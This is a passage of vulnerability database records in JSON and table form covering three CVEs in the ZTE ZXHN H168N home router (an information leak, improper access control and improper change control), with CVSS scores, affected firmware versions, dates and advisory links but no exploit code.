"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-21735",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-21735",
"trust": 1.8,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A ZTE product has an information leak vulnerability. Due to improper permission settings, an attacker with ordinary user permissions could exploit this vulnerability to obtain some sensitive user information through the wizard page without authentication. This affects ZXHN H168N all versions up to V3.5.0_EG1T4_TE. ZXHN H168N There is a vulnerability in improper retention of permissions.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-21735",
"trust": 3.2
},
{
"db": "ZTE",
"id": "1015924",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007929",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202106-790",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"id": "VAR-202106-0821",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.37662336
},
"last_update_date": "2023-12-18T13:22:51.071000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Information\u00a0Leak\u00a0Vulnerability\u00a0in\u00a0A\u00a0ZTE\u00a0Product",
"trust": 0.8,
"url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1015924"
},
{
"title": "ZTE ZXHN H168N Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=153798"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-281",
"trust": 1.0
},
{
"problemtype": "Improper retention of permissions (CWE-281) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1015924"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21735"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"date": "2021-06-10T12:15:08.457000",
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"date": "2021-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-28T05:49:00",
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"date": "2021-06-17T18:56:27.863000",
"db": "NVD",
"id": "CVE-2021-21735"
},
{
"date": "2021-06-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZXHN\u00a0H168N\u00a0 Vulnerability regarding improper retention of permissions in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-790"
}
],
"trust": 0.6
}
}
cve-2018-7357
Vulnerability from cvelistv5
Published
2018-11-14 15:00
Modified
2024-08-05 06:24
Severity ?
EPSS score ?
Summary
ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.exploit-db.com/exploits/45972/ | exploit, x_refsource_EXPLOIT-DB | |
| http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523 | x_refsource_CONFIRM |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | ZTE | ZXHN H168N |
Version: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:24:12.002Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "45972",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ZXHN H168N",
"vendor": "ZTE",
"versions": [
{
"status": "affected",
"version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
}
]
}
],
"datePublic": "2018-11-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Authorization\n",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-12T10:57:01",
"orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
"shortName": "zte"
},
"references": [
{
"name": "45972",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@zte.com.cn",
"ID": "CVE-2018-7357",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ZXHN H168N",
"version": {
"version_data": [
{
"version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
}
]
}
}
]
},
"vendor_name": "ZTE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Improper Authorization\n"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "45972",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
"refsource": "CONFIRM",
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
"assignerShortName": "zte",
"cveId": "CVE-2018-7357",
"datePublished": "2018-11-14T15:00:00",
"dateReserved": "2018-02-22T00:00:00",
"dateUpdated": "2024-08-05T06:24:12.002Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-7358
Vulnerability from cvelistv5
Published
2018-11-14 15:00
Modified
2024-08-05 06:24
Severity ?
EPSS score ?
Summary
ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/105963 | vdb-entry, x_refsource_BID | |
| https://www.exploit-db.com/exploits/45972/ | exploit, x_refsource_EXPLOIT-DB | |
| http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523 | x_refsource_CONFIRM |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | ZTE | ZXHN H168N |
Version: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:24:11.858Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "105963",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105963"
},
{
"name": "45972",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ZXHN H168N",
"vendor": "ZTE",
"versions": [
{
"status": "affected",
"version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
}
]
}
],
"datePublic": "2018-11-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Authorization\n",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-12T10:57:01",
"orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
"shortName": "zte"
},
"references": [
{
"name": "105963",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105963"
},
{
"name": "45972",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@zte.com.cn",
"ID": "CVE-2018-7358",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ZXHN H168N",
"version": {
"version_data": [
{
"version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
}
]
}
}
]
},
"vendor_name": "ZTE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Improper Authorization\n"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "105963",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105963"
},
{
"name": "45972",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
"refsource": "CONFIRM",
"url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
"assignerShortName": "zte",
"cveId": "CVE-2018-7358",
"datePublished": "2018-11-14T15:00:00",
"dateReserved": "2018-02-22T00:00:00",
"dateUpdated": "2024-08-05T06:24:11.858Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}